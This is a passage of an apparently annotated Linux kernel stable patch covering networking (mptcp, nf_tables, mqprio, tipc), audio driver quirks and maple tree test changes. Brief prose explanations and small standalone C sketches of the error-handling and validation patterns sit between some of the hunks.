+-	sock_set_flag(sock->sk, SOCK_RCU_FREE);
++	inet_sk_state_store(sk, TCP_LISTEN);
++	sock_set_flag(sk, SOCK_RCU_FREE);
+ 
+ 	err = ssock->ops->listen(ssock, backlog);
+-	inet_sk_state_store(sock->sk, inet_sk_state_load(ssock->sk));
++	inet_sk_state_store(sk, inet_sk_state_load(ssock->sk));
+ 	if (!err)
+-		mptcp_copy_inaddrs(sock->sk, ssock->sk);
++		mptcp_copy_inaddrs(sk, ssock->sk);
+ 
+ unlock:
+-	release_sock(sock->sk);
++	release_sock(sk);
+ 	return err;
+ }
+ 
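
Besides caching sock->sk in a local, the mptcp_listen() hunk above adds an early guard: listen() is refused unless the socket is still unconnected and of stream type. A standalone sketch of the guard-under-lock shape, with toy enums in place of the real socket state:

	#include <stdio.h>

	enum sock_state { SS_UNCONNECTED, SS_CONNECTED };
	enum sock_type  { SOCK_STREAM, SOCK_DGRAM };

	struct socket { enum sock_state state; enum sock_type type; };

	static int do_listen(struct socket *sock)
	{
		int err = -22;	/* stand-in for -EINVAL */

		/* lock_sock(sk) would go here */
		if (sock->state != SS_UNCONNECTED || sock->type != SOCK_STREAM)
			goto unlock;
		err = 0;	/* proceed with the real listen path */
	unlock:
		/* release_sock(sk) would go here */
		return err;
	}

	int main(void)
	{
		struct socket ok = { SS_UNCONNECTED, SOCK_STREAM };
		struct socket bad = { SS_CONNECTED, SOCK_STREAM };

		printf("%d %d\n", do_listen(&ok), do_listen(&bad));	/* 0 -22 */
		return 0;
	}
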
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index ecde497368ec4..dd57a9ebe113d 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3626,8 +3626,6 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 			NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
+ 			return PTR_ERR(chain);
+ 		}
+-		if (nft_chain_is_bound(chain))
+-			return -EOPNOTSUPP;
+ 
+ 	} else if (nla[NFTA_RULE_CHAIN_ID]) {
+ 		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID],
+@@ -3640,6 +3638,9 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 		return -EINVAL;
+ 	}
+ 
++	if (nft_chain_is_bound(chain))
++		return -EOPNOTSUPP;
++
+ 	if (nla[NFTA_RULE_HANDLE]) {
+ 		handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_HANDLE]));
+ 		rule = __nft_rule_lookup(chain, handle);
+@@ -6504,19 +6505,19 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 	if (flags)
+ 		*nft_set_ext_flags(ext) = flags;
+ 
++	if (obj) {
++		*nft_set_ext_obj(ext) = obj;
++		obj->use++;
++	}
+ 	if (ulen > 0) {
+ 		if (nft_set_ext_check(&tmpl, NFT_SET_EXT_USERDATA, ulen) < 0) {
+ 			err = -EINVAL;
+-			goto err_elem_userdata;
++			goto err_elem_free;
+ 		}
+ 		udata = nft_set_ext_userdata(ext);
+ 		udata->len = ulen - 1;
+ 		nla_memcpy(&udata->data, nla[NFTA_SET_ELEM_USERDATA], ulen);
+ 	}
+-	if (obj) {
+-		*nft_set_ext_obj(ext) = obj;
+-		obj->use++;
+-	}
+ 	err = nft_set_elem_expr_setup(ctx, &tmpl, ext, expr_array, num_exprs);
+ 	if (err < 0)
+ 		goto err_elem_free;
+@@ -6571,10 +6572,9 @@ err_set_full:
+ err_element_clash:
+ 	kfree(trans);
+ err_elem_free:
++	nf_tables_set_elem_destroy(ctx, set, elem.priv);
+ 	if (obj)
+ 		obj->use--;
+-err_elem_userdata:
+-	nft_set_elem_destroy(set, elem.priv, true);
+ err_parse_data:
+ 	if (nla[NFTA_SET_ELEM_DATA] != NULL)
+ 		nft_data_release(&elem.data.val, desc.type);
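
The reordering in the nft_add_set_elem() hunk above exists so that every failure after the element is built can funnel through one err_elem_free label that tears the whole element down. A standalone sketch of the same unwind idiom, with toy resources in place of the nftables object reference and userdata:

	#include <stdlib.h>
	#include <stdio.h>

	struct elem {
		int *obj;
		char *udata;
	};

	static void elem_destroy(struct elem *e)
	{
		free(e->obj);		/* free(NULL) is a no-op, partial builds are fine */
		free(e->udata);
		free(e);
	}

	static struct elem *elem_create(int udata_ok)
	{
		struct elem *e = calloc(1, sizeof(*e));

		if (!e)
			return NULL;
		e->obj = malloc(sizeof(int));	/* attach the object first... */
		if (!e->obj)
			goto err_elem_free;
		if (!udata_ok)			/* ...so a userdata failure here... */
			goto err_elem_free;	/* ...reuses the single unwind label */
		e->udata = malloc(16);
		if (!e->udata)
			goto err_elem_free;
		return e;

	err_elem_free:
		elem_destroy(e);		/* tears down whatever was attached */
		return NULL;
	}

	int main(void)
	{
		struct elem *e = elem_create(1);

		printf("%s\n", e ? "created" : "failed");
		if (e)
			elem_destroy(e);
		printf("%s\n", elem_create(0) ? "created" : "failed");
		return 0;
	}
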
+diff --git a/net/netfilter/nft_immediate.c b/net/netfilter/nft_immediate.c
+index 900e75e8c3465..391c18e4b3ebd 100644
+--- a/net/netfilter/nft_immediate.c
++++ b/net/netfilter/nft_immediate.c
+@@ -125,15 +125,27 @@ static void nft_immediate_activate(const struct nft_ctx *ctx,
+ 	return nft_data_hold(&priv->data, nft_dreg_to_type(priv->dreg));
+ }
+ 
++static void nft_immediate_chain_deactivate(const struct nft_ctx *ctx,
++					   struct nft_chain *chain,
++					   enum nft_trans_phase phase)
++{
++	struct nft_ctx chain_ctx;
++	struct nft_rule *rule;
++
++	chain_ctx = *ctx;
++	chain_ctx.chain = chain;
++
++	list_for_each_entry(rule, &chain->rules, list)
++		nft_rule_expr_deactivate(&chain_ctx, rule, phase);
++}
++
+ static void nft_immediate_deactivate(const struct nft_ctx *ctx,
+ 				     const struct nft_expr *expr,
+ 				     enum nft_trans_phase phase)
+ {
+ 	const struct nft_immediate_expr *priv = nft_expr_priv(expr);
+ 	const struct nft_data *data = &priv->data;
+-	struct nft_ctx chain_ctx;
+ 	struct nft_chain *chain;
+-	struct nft_rule *rule;
+ 
+ 	if (priv->dreg == NFT_REG_VERDICT) {
+ 		switch (data->verdict.code) {
+@@ -143,20 +155,17 @@ static void nft_immediate_deactivate(const struct nft_ctx *ctx,
+ 			if (!nft_chain_binding(chain))
+ 				break;
+ 
+-			chain_ctx = *ctx;
+-			chain_ctx.chain = chain;
+-
+-			list_for_each_entry(rule, &chain->rules, list)
+-				nft_rule_expr_deactivate(&chain_ctx, rule, phase);
+-
+ 			switch (phase) {
+ 			case NFT_TRANS_PREPARE_ERROR:
+ 				nf_tables_unbind_chain(ctx, chain);
+-				fallthrough;
++				nft_deactivate_next(ctx->net, chain);
++				break;
+ 			case NFT_TRANS_PREPARE:
++				nft_immediate_chain_deactivate(ctx, chain, phase);
+ 				nft_deactivate_next(ctx->net, chain);
+ 				break;
+ 			default:
++				nft_immediate_chain_deactivate(ctx, chain, phase);
+ 				nft_chain_del(chain);
+ 				chain->bound = false;
+ 				chain->table->use--;
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 5c05c9b990fba..8d73fffd2d09d 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -217,29 +217,37 @@ static void *nft_rbtree_get(const struct net *net, const struct nft_set *set,
+ 
+ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 			      struct nft_rbtree *priv,
+-			      struct nft_rbtree_elem *rbe)
++			      struct nft_rbtree_elem *rbe,
++			      u8 genmask)
+ {
+ 	struct nft_set *set = (struct nft_set *)__set;
+ 	struct rb_node *prev = rb_prev(&rbe->node);
+-	struct nft_rbtree_elem *rbe_prev = NULL;
++	struct nft_rbtree_elem *rbe_prev;
+ 	struct nft_set_gc_batch *gcb;
+ 
+ 	gcb = nft_set_gc_batch_check(set, NULL, GFP_ATOMIC);
+ 	if (!gcb)
+ 		return -ENOMEM;
+ 
+-	/* search for expired end interval coming before this element. */
++	/* search for end interval coming before this element.
++	 * end intervals don't carry a timeout extension, they
++	 * are coupled with the interval start element.
++	 */
+ 	while (prev) {
+ 		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
+-		if (nft_rbtree_interval_end(rbe_prev))
++		if (nft_rbtree_interval_end(rbe_prev) &&
++		    nft_set_elem_active(&rbe_prev->ext, genmask))
+ 			break;
+ 
+ 		prev = rb_prev(prev);
+ 	}
+ 
+-	if (rbe_prev) {
++	if (prev) {
++		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
++
+ 		rb_erase(&rbe_prev->node, &priv->root);
+ 		atomic_dec(&set->nelems);
++		nft_set_gc_batch_add(gcb, rbe_prev);
+ 	}
+ 
+ 	rb_erase(&rbe->node, &priv->root);
+@@ -321,7 +329,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 
+ 		/* perform garbage collection to avoid bogus overlap reports. */
+ 		if (nft_set_elem_expired(&rbe->ext)) {
+-			err = nft_rbtree_gc_elem(set, priv, rbe);
++			err = nft_rbtree_gc_elem(set, priv, rbe, genmask);
+ 			if (err < 0)
+ 				return err;
+ 
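
The genmask parameter threaded through nft_rbtree_gc_elem() above makes the backward search skip end-interval elements belonging to other generations. A standalone sketch of that search, with an array walk standing in for rb_prev() and a bitmask for nft_set_elem_active():

	#include <stdbool.h>
	#include <stdio.h>

	struct elem { bool interval_end; unsigned char genmask; };

	static bool active(const struct elem *e, unsigned char genmask)
	{
		return e->genmask & genmask;	/* stand-in for nft_set_elem_active() */
	}

	/* Walk backwards from idx, returning the nearest *active* end element. */
	static int find_prev_end(const struct elem *v, int idx, unsigned char genmask)
	{
		for (int i = idx - 1; i >= 0; i--)
			if (v[i].interval_end && active(&v[i], genmask))
				return i;
		return -1;
	}

	int main(void)
	{
		struct elem v[] = {
			{ true,  0x1 },		/* active end */
			{ true,  0x2 },		/* end from another generation */
			{ false, 0x1 },		/* expired start being collected */
		};

		printf("%d\n", find_prev_end(v, 2, 0x1));	/* 0, skips index 1 */
		return 0;
	}
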
+diff --git a/net/sched/sch_mqprio.c b/net/sched/sch_mqprio.c
+index 9f26fb7d5823c..b99e0fe0229cf 100644
+--- a/net/sched/sch_mqprio.c
++++ b/net/sched/sch_mqprio.c
+@@ -130,6 +130,97 @@ static int parse_attr(struct nlattr *tb[], int maxtype, struct nlattr *nla,
+ 	return 0;
+ }
+ 
++static int mqprio_parse_nlattr(struct Qdisc *sch, struct tc_mqprio_qopt *qopt,
++			       struct nlattr *opt,
++			       struct netlink_ext_ack *extack)
++{
++	struct mqprio_sched *priv = qdisc_priv(sch);
++	struct nlattr *tb[TCA_MQPRIO_MAX + 1];
++	struct nlattr *attr;
++	int i, rem, err;
++
++	err = parse_attr(tb, TCA_MQPRIO_MAX, opt, mqprio_policy,
++			 sizeof(*qopt));
++	if (err < 0)
++		return err;
++
++	if (!qopt->hw) {
++		NL_SET_ERR_MSG(extack,
++			       "mqprio TCA_OPTIONS can only contain netlink attributes in hardware mode");
++		return -EINVAL;
++	}
++
++	if (tb[TCA_MQPRIO_MODE]) {
++		priv->flags |= TC_MQPRIO_F_MODE;
++		priv->mode = *(u16 *)nla_data(tb[TCA_MQPRIO_MODE]);
++	}
++
++	if (tb[TCA_MQPRIO_SHAPER]) {
++		priv->flags |= TC_MQPRIO_F_SHAPER;
++		priv->shaper = *(u16 *)nla_data(tb[TCA_MQPRIO_SHAPER]);
++	}
++
++	if (tb[TCA_MQPRIO_MIN_RATE64]) {
++		if (priv->shaper != TC_MQPRIO_SHAPER_BW_RATE) {
++			NL_SET_ERR_MSG_ATTR(extack, tb[TCA_MQPRIO_MIN_RATE64],
++					    "min_rate accepted only when shaper is in bw_rlimit mode");
++			return -EINVAL;
++		}
++		i = 0;
++		nla_for_each_nested(attr, tb[TCA_MQPRIO_MIN_RATE64],
++				    rem) {
++			if (nla_type(attr) != TCA_MQPRIO_MIN_RATE64) {
++				NL_SET_ERR_MSG_ATTR(extack, attr,
++						    "Attribute type expected to be TCA_MQPRIO_MIN_RATE64");
++				return -EINVAL;
++			}
++
++			if (nla_len(attr) != sizeof(u64)) {
++				NL_SET_ERR_MSG_ATTR(extack, attr,
++						    "Attribute TCA_MQPRIO_MIN_RATE64 expected to have 8 bytes length");
++				return -EINVAL;
++			}
++
++			if (i >= qopt->num_tc)
++				break;
++			priv->min_rate[i] = *(u64 *)nla_data(attr);
++			i++;
++		}
++		priv->flags |= TC_MQPRIO_F_MIN_RATE;
++	}
++
++	if (tb[TCA_MQPRIO_MAX_RATE64]) {
++		if (priv->shaper != TC_MQPRIO_SHAPER_BW_RATE) {
++			NL_SET_ERR_MSG_ATTR(extack, tb[TCA_MQPRIO_MAX_RATE64],
++					    "max_rate accepted only when shaper is in bw_rlimit mode");
++			return -EINVAL;
++		}
++		i = 0;
++		nla_for_each_nested(attr, tb[TCA_MQPRIO_MAX_RATE64],
++				    rem) {
++			if (nla_type(attr) != TCA_MQPRIO_MAX_RATE64) {
++				NL_SET_ERR_MSG_ATTR(extack, attr,
++						    "Attribute type expected to be TCA_MQPRIO_MAX_RATE64");
++				return -EINVAL;
++			}
++
++			if (nla_len(attr) != sizeof(u64)) {
++				NL_SET_ERR_MSG_ATTR(extack, attr,
++						    "Attribute TCA_MQPRIO_MAX_RATE64 expected to have 8 bytes length");
++				return -EINVAL;
++			}
++
++			if (i >= qopt->num_tc)
++				break;
++			priv->max_rate[i] = *(u64 *)nla_data(attr);
++			i++;
++		}
++		priv->flags |= TC_MQPRIO_F_MAX_RATE;
++	}
++
++	return 0;
++}
++
+ static int mqprio_init(struct Qdisc *sch, struct nlattr *opt,
+ 		       struct netlink_ext_ack *extack)
+ {
+@@ -139,9 +230,6 @@ static int mqprio_init(struct Qdisc *sch, struct nlattr *opt,
+ 	struct Qdisc *qdisc;
+ 	int i, err = -EOPNOTSUPP;
+ 	struct tc_mqprio_qopt *qopt = NULL;
+-	struct nlattr *tb[TCA_MQPRIO_MAX + 1];
+-	struct nlattr *attr;
+-	int rem;
+ 	int len;
+ 
+ 	BUILD_BUG_ON(TC_MAX_QUEUE != TC_QOPT_MAX_QUEUE);
+@@ -166,55 +254,9 @@ static int mqprio_init(struct Qdisc *sch, struct nlattr *opt,
+ 
+ 	len = nla_len(opt) - NLA_ALIGN(sizeof(*qopt));
+ 	if (len > 0) {
+-		err = parse_attr(tb, TCA_MQPRIO_MAX, opt, mqprio_policy,
+-				 sizeof(*qopt));
+-		if (err < 0)
++		err = mqprio_parse_nlattr(sch, qopt, opt, extack);
++		if (err)
+ 			return err;
+-
+-		if (!qopt->hw)
+-			return -EINVAL;
+-
+-		if (tb[TCA_MQPRIO_MODE]) {
+-			priv->flags |= TC_MQPRIO_F_MODE;
+-			priv->mode = *(u16 *)nla_data(tb[TCA_MQPRIO_MODE]);
+-		}
+-
+-		if (tb[TCA_MQPRIO_SHAPER]) {
+-			priv->flags |= TC_MQPRIO_F_SHAPER;
+-			priv->shaper = *(u16 *)nla_data(tb[TCA_MQPRIO_SHAPER]);
+-		}
+-
+-		if (tb[TCA_MQPRIO_MIN_RATE64]) {
+-			if (priv->shaper != TC_MQPRIO_SHAPER_BW_RATE)
+-				return -EINVAL;
+-			i = 0;
+-			nla_for_each_nested(attr, tb[TCA_MQPRIO_MIN_RATE64],
+-					    rem) {
+-				if (nla_type(attr) != TCA_MQPRIO_MIN_RATE64)
+-					return -EINVAL;
+-				if (i >= qopt->num_tc)
+-					break;
+-				priv->min_rate[i] = *(u64 *)nla_data(attr);
+-				i++;
+-			}
+-			priv->flags |= TC_MQPRIO_F_MIN_RATE;
+-		}
+-
+-		if (tb[TCA_MQPRIO_MAX_RATE64]) {
+-			if (priv->shaper != TC_MQPRIO_SHAPER_BW_RATE)
+-				return -EINVAL;
+-			i = 0;
+-			nla_for_each_nested(attr, tb[TCA_MQPRIO_MAX_RATE64],
+-					    rem) {
+-				if (nla_type(attr) != TCA_MQPRIO_MAX_RATE64)
+-					return -EINVAL;
+-				if (i >= qopt->num_tc)
+-					break;
+-				priv->max_rate[i] = *(u64 *)nla_data(attr);
+-				i++;
+-			}
+-			priv->flags |= TC_MQPRIO_F_MAX_RATE;
+-		}
+ 	}
+ 
+ 	/* pre-allocate qdisc, attachment can't fail */
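
Beyond extracting mqprio_parse_nlattr(), the hunk above tightens validation: each nested rate attribute must carry the expected type and exactly eight bytes of payload, with an extack message on failure instead of a bare -EINVAL. A standalone sketch of that per-attribute check, using a toy TLV struct instead of real netlink attributes:

	#include <stdint.h>
	#include <stdio.h>
	#include <string.h>

	struct tlv { uint16_t type; uint16_t len; const void *data; };

	#define RATE64 1

	static int parse_rate64(const struct tlv *attr, uint64_t *out)
	{
		if (attr->type != RATE64)
			return -1;		/* wrong attribute type */
		if (attr->len != sizeof(uint64_t))
			return -1;		/* u64 payload expected */
		memcpy(out, attr->data, sizeof(*out));
		return 0;
	}

	int main(void)
	{
		uint64_t rate, raw = 1000000;
		struct tlv ok = { RATE64, sizeof(raw), &raw };
		struct tlv bad = { RATE64, 4, &raw };	/* truncated payload */

		printf("%d %d\n", parse_rate64(&ok, &rate), parse_rate64(&bad, &rate));
		return 0;
	}
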
+diff --git a/net/tipc/crypto.c b/net/tipc/crypto.c
+index d67440de011e7..2b236d95a6469 100644
+--- a/net/tipc/crypto.c
++++ b/net/tipc/crypto.c
+@@ -1960,7 +1960,8 @@ rcv:
+ 
+ 	skb_reset_network_header(*skb);
+ 	skb_pull(*skb, tipc_ehdr_size(ehdr));
+-	pskb_trim(*skb, (*skb)->len - aead->authsize);
++	if (pskb_trim(*skb, (*skb)->len - aead->authsize))
++		goto free_skb;
+ 
+ 	/* Validate TIPCv2 message */
+ 	if (unlikely(!tipc_msg_validate(skb))) {
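
The tipc change above stops ignoring pskb_trim()'s return value, which can fail on nonlinear skbs, and routes the failure to the free path. A standalone sketch of the pattern, with a toy buffer in place of the skb:

	#include <stdio.h>

	struct buf { int len; };

	static int trim(struct buf *b, int newlen)
	{
		if (newlen < 0)
			return -1;	/* stand-in for a pskb_trim() failure */
		b->len = newlen;
		return 0;
	}

	static int rcv(struct buf *b, int authsize)
	{
		if (trim(b, b->len - authsize))
			goto free_buf;	/* previously the error was silently dropped */
		return 0;
	free_buf:
		return -1;		/* the real code frees the skb here */
	}

	int main(void)
	{
		struct buf b = { .len = 16 };

		printf("%d\n", rcv(&b, 32));	/* authsize > len -> fails cleanly */
		return 0;
	}
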
+diff --git a/net/tipc/node.c b/net/tipc/node.c
+index 5e000fde80676..a9c5b6594889b 100644
+--- a/net/tipc/node.c
++++ b/net/tipc/node.c
+@@ -583,7 +583,7 @@ update:
+ 				 n->capabilities, &n->bc_entry.inputq1,
+ 				 &n->bc_entry.namedq, snd_l, &n->bc_entry.link)) {
+ 		pr_warn("Broadcast rcv link creation failed, no memory\n");
+-		kfree(n);
++		tipc_node_put(n);
+ 		n = NULL;
+ 		goto exit;
+ 	}
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index cb34a62075b13..f93b68a2a8393 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9457,6 +9457,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x880d, "HP EliteBook 830 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8811, "HP Spectre x360 15-eb1xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
+ 	SND_PCI_QUIRK(0x103c, 0x8812, "HP Spectre x360 15-eb1xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
++	SND_PCI_QUIRK(0x103c, 0x881d, "HP 250 G8 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8846, "HP EliteBook 850 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8847, "HP EliteBook x360 830 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x884b, "HP EliteBook 840 Aero G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+@@ -9580,6 +9581,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1c62, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1c92, "ASUS ROG Strix G15", ALC285_FIXUP_ASUS_G533Z_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1ccd, "ASUS X555UB", ALC256_FIXUP_ASUS_MIC),
++	SND_PCI_QUIRK(0x1043, 0x1d1f, "ASUS ROG Strix G17 2023 (G713PV)", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1d42, "ASUS Zephyrus G14 2022", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1d4e, "ASUS TM420", ALC256_FIXUP_ASUS_HPE),
+ 	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402", ALC245_FIXUP_CS35L41_SPI_2),
+diff --git a/sound/soc/codecs/wm8904.c b/sound/soc/codecs/wm8904.c
+index 791d8738d1c0e..a05d4dafd3d77 100644
+--- a/sound/soc/codecs/wm8904.c
++++ b/sound/soc/codecs/wm8904.c
+@@ -2308,6 +2308,9 @@ static int wm8904_i2c_probe(struct i2c_client *i2c)
+ 	regmap_update_bits(wm8904->regmap, WM8904_BIAS_CONTROL_0,
+ 			    WM8904_POBCTRL, 0);
+ 
++	/* Fill the cache for the ADC test register */
++	regmap_read(wm8904->regmap, WM8904_ADC_TEST_0, &val);
++
+ 	/* Can leave the device powered off until we need it */
+ 	regcache_cache_only(wm8904->regmap, true);
+ 	regulator_bulk_disable(ARRAY_SIZE(wm8904->supplies), wm8904->supplies);
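
The wm8904 hunk above reads WM8904_ADC_TEST_0 once while the device is still powered, so the regmap cache holds a value before the driver switches to cache-only mode. A standalone sketch of why seeding matters, with a two-entry array standing in for regmap and made-up register values:

	#include <stdio.h>

	static int cache[2] = { -1, -1 };	/* -1: never read from hardware */
	static int hw[2] = { 0x0a, 0x33 };	/* made-up register contents */
	static int cache_only;			/* stand-in for regcache_cache_only() */

	static int reg_read(int reg, int *val)
	{
		if (cache[reg] < 0) {
			if (cache_only)
				return -1;	/* uncached read while powered off fails */
			cache[reg] = hw[reg];	/* powered read seeds the cache */
		}
		*val = cache[reg];
		return 0;
	}

	int main(void)
	{
		int val;

		reg_read(0, &val);		/* seed register 0 while "powered" */
		cache_only = 1;			/* power off, cache-only mode */
		printf("%d\n", reg_read(0, &val));	/* 0: served from cache */
		printf("%d\n", reg_read(1, &val));	/* -1: was never seeded */
		return 0;
	}
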
+diff --git a/sound/soc/fsl/fsl_spdif.c b/sound/soc/fsl/fsl_spdif.c
+index 275aba8e0c469..fb6806b2db859 100644
+--- a/sound/soc/fsl/fsl_spdif.c
++++ b/sound/soc/fsl/fsl_spdif.c
+@@ -751,6 +751,8 @@ static int fsl_spdif_trigger(struct snd_pcm_substream *substream,
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+ 		regmap_update_bits(regmap, REG_SPDIF_SCR, dmaen, 0);
+ 		regmap_update_bits(regmap, REG_SPDIF_SIE, intr, 0);
++		regmap_write(regmap, REG_SPDIF_STL, 0x0);
++		regmap_write(regmap, REG_SPDIF_STR, 0x0);
+ 		break;
+ 	default:
+ 		return -EINVAL;
+diff --git a/tools/testing/radix-tree/linux/init.h b/tools/testing/radix-tree/linux/init.h
+index 1bb0afc213099..81563c3dfce79 100644
+--- a/tools/testing/radix-tree/linux/init.h
++++ b/tools/testing/radix-tree/linux/init.h
+@@ -1 +1,2 @@
+ #define __init
++#define __exit
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index d1ab5f23f4e4c..cd96a3ee7bb89 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -13,6 +13,7 @@
+ #include "test.h"
+ #include <stdlib.h>
+ #include <time.h>
++#include "linux/init.h"
+ 
+ #define module_init(x)
+ #define module_exit(x)
+@@ -58,7 +59,7 @@ struct rcu_reader_struct {
+  * check_new_node() - Check the creation of new nodes and error path
+  * verification.
+  */
+-static noinline void check_new_node(struct maple_tree *mt)
++static noinline void __init check_new_node(struct maple_tree *mt)
+ {
+ 
+ 	struct maple_node *mn, *mn2, *mn3;
+@@ -430,7 +431,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ /*
+  * Check erasing including RCU.
+  */
+-static noinline void check_erase(struct maple_tree *mt, unsigned long index,
++static noinline void __init check_erase(struct maple_tree *mt, unsigned long index,
+ 		void *ptr)
+ {
+ 	MT_BUG_ON(mt, mtree_test_erase(mt, index) != ptr);
+@@ -440,24 +441,24 @@ static noinline void check_erase(struct maple_tree *mt, unsigned long index,
+ #define erase_check_insert(mt, i) check_insert(mt, set[i], entry[i%2])
+ #define erase_check_erase(mt, i) check_erase(mt, set[i], entry[i%2])
+ 
+-static noinline void check_erase_testset(struct maple_tree *mt)
++static noinline void __init check_erase_testset(struct maple_tree *mt)
+ {
+-	unsigned long set[] = { 5015, 5014, 5017, 25, 1000,
+-				1001, 1002, 1003, 1005, 0,
+-				6003, 6002, 6008, 6012, 6015,
+-				7003, 7002, 7008, 7012, 7015,
+-				8003, 8002, 8008, 8012, 8015,
+-				9003, 9002, 9008, 9012, 9015,
+-				10003, 10002, 10008, 10012, 10015,
+-				11003, 11002, 11008, 11012, 11015,
+-				12003, 12002, 12008, 12012, 12015,
+-				13003, 13002, 13008, 13012, 13015,
+-				14003, 14002, 14008, 14012, 14015,
+-				15003, 15002, 15008, 15012, 15015,
+-			      };
+-
+-
+-	void *ptr = &set;
++	static const unsigned long set[] = { 5015, 5014, 5017, 25, 1000,
++					     1001, 1002, 1003, 1005, 0,
++					     6003, 6002, 6008, 6012, 6015,
++					     7003, 7002, 7008, 7012, 7015,
++					     8003, 8002, 8008, 8012, 8015,
++					     9003, 9002, 9008, 9012, 9015,
++					     10003, 10002, 10008, 10012, 10015,
++					     11003, 11002, 11008, 11012, 11015,
++					     12003, 12002, 12008, 12012, 12015,
++					     13003, 13002, 13008, 13012, 13015,
++					     14003, 14002, 14008, 14012, 14015,
++					     15003, 15002, 15008, 15012, 15015,
++					   };
++
++
++	void *ptr = &check_erase_testset;
+ 	void *entry[2] = { ptr, mt };
+ 	void *root_node;
+ 
+@@ -714,7 +715,7 @@ static noinline void check_erase_testset(struct maple_tree *mt)
+ int mas_ce2_over_count(struct ma_state *mas_start, struct ma_state *mas_end,
+ 		      void *s_entry, unsigned long s_min,
+ 		      void *e_entry, unsigned long e_max,
+-		      unsigned long *set, int i, bool null_entry)
++		      const unsigned long *set, int i, bool null_entry)
+ {
+ 	int count = 0, span = 0;
+ 	unsigned long retry = 0;
+@@ -944,8 +945,8 @@ retry:
+ }
+ 
+ #if defined(CONFIG_64BIT)
+-static noinline void check_erase2_testset(struct maple_tree *mt,
+-		unsigned long *set, unsigned long size)
++static noinline void __init check_erase2_testset(struct maple_tree *mt,
++		const unsigned long *set, unsigned long size)
+ {
+ 	int entry_count = 0;
+ 	int check = 0;
+@@ -1089,11 +1090,11 @@ static noinline void check_erase2_testset(struct maple_tree *mt,
+ 
+ 
+ /* These tests were pulled from KVM tree modifications which failed. */
+-static noinline void check_erase2_sets(struct maple_tree *mt)
++static noinline void __init check_erase2_sets(struct maple_tree *mt)
+ {
+ 	void *entry;
+ 	unsigned long start = 0;
+-	unsigned long set[] = {
++	static const unsigned long set[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140721266458624, 140737488351231,
+ ERASE, 140721266458624, 140737488351231,
+@@ -1111,7 +1112,7 @@ ERASE, 140253902692352, 140253902864383,
+ STORE, 140253902692352, 140253902696447,
+ STORE, 140253902696448, 140253902864383,
+ 		};
+-	unsigned long set2[] = {
++	static const unsigned long set2[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140735933583360, 140737488351231,
+ ERASE, 140735933583360, 140737488351231,
+@@ -1135,7 +1136,7 @@ STORE, 140277094813696, 140277094821887,
+ STORE, 140277094821888, 140277094825983,
+ STORE, 140735933906944, 140735933911039,
+ 	};
+-	unsigned long set3[] = {
++	static const unsigned long set3[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140735790264320, 140737488351231,
+ ERASE, 140735790264320, 140737488351231,
+@@ -1178,7 +1179,7 @@ STORE, 47135835840512, 47135835885567,
+ STORE, 47135835885568, 47135835893759,
+ 	};
+ 
+-	unsigned long set4[] = {
++	static const unsigned long set4[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140728251703296, 140737488351231,
+ ERASE, 140728251703296, 140737488351231,
+@@ -1199,7 +1200,7 @@ ERASE, 47646523277312, 47646523445247,
+ STORE, 47646523277312, 47646523400191,
+ 	};
+ 
+-	unsigned long set5[] = {
++	static const unsigned long set5[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140726874062848, 140737488351231,
+ ERASE, 140726874062848, 140737488351231,
+@@ -1332,7 +1333,7 @@ STORE, 47884791619584, 47884791623679,
+ STORE, 47884791623680, 47884791627775,
+ 	};
+ 
+-	unsigned long set6[] = {
++	static const unsigned long set6[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140722999021568, 140737488351231,
